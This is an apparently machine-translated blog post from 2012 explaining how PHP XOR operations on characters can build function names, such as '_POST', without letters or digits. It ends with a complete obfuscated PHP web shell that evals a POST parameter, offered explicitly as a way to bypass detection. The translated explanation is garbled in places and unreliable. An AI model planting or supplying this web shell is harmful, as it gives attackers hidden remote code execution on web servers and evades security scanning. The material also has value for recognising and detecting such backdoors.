PHP Backdoor--XOR

Look at this:

<? PHP

Echo "A" ^"}";

?>

Run this code, then the result of the output is the character "<", the reason is that the result is because the character "a" and the character "}" in the code is different or operation. In PHP, when two variables are XOR, the string is converted to binary and then XOR, XOR, or end, and the result is converted from binary to string. XOR operations are sometimes used to exchange values of two variables.

As we all know, PHP is a weak type of language, that is, in PHP we can not pre-declare the type of variables, and directly declare a variable and initialization or assignment operation. Because of this feature of PHP's weak type, we implicitly convert the variable type of PHP and use this feature for some unconventional operations. If you convert an integer to a string, treat a Boolean as an integer, or use a string as a function, let's look at a piece of code:

<? PHP

$_ ++;  

$__ = "<" ^ "}";  

$__ ("stuff");

?>

See this code, you may feel very confused, below I briefly to explain:

(1) $_++; this line of code means self-increment of variables named "_", and the default value for undefined variables in PHP is null,null==false==0, and we can get a number without using any numbers, by adding an undefined variable to the self-increment operation.

(2) $__= "<" ^ "}"; xor the character "<" and "}" to get the variable named "__" (two underscore) in the result a

(3) $__ ("stuff"); with the above assignment, the value of the variable $__ is a, so this line can be considered a ("stuff"), in PHP, this line of code represents the call to function A, but because the program does not define function A, So this line of code throws a fatal error to stop the program from running. This line of code doesn't really make sense, but it's simple enough to show that in PHP, we can treat a string as a function.

Article to here, if you see a similar PHP back door should not be so confusing, you can use a sentence to analyze the backdoor code to understand the backdoor want to implement the function. If you are still confused, that indicates that this rookie article is not good, first say sorry, but still hope you don't scold me.

The above example code finally error, cause the program to stop running, of course, writing a wrong program is not our purpose, the main purpose of using this backdoor is to create some can bypass the detection and useful strings, such as _post "," System "," Call_user_ Func_array ", or anything we need.

Here is a very simple non-alphanumeric PHP Backdoor:

@$_++;//$_ = 1
$__=("#"^"|"); // $__ = _
$__.=("." ^"~"); _p
$__.= ("/" ^ "'");//_po
$__.=("|" ^"/"); _pos
$__.= ("{" ^ "/");//_post
@eval (${$__}[!$_]);//mima:0

A serving knife.

This article is from "Refresh" 2012: "blog, reprint please contact the author!"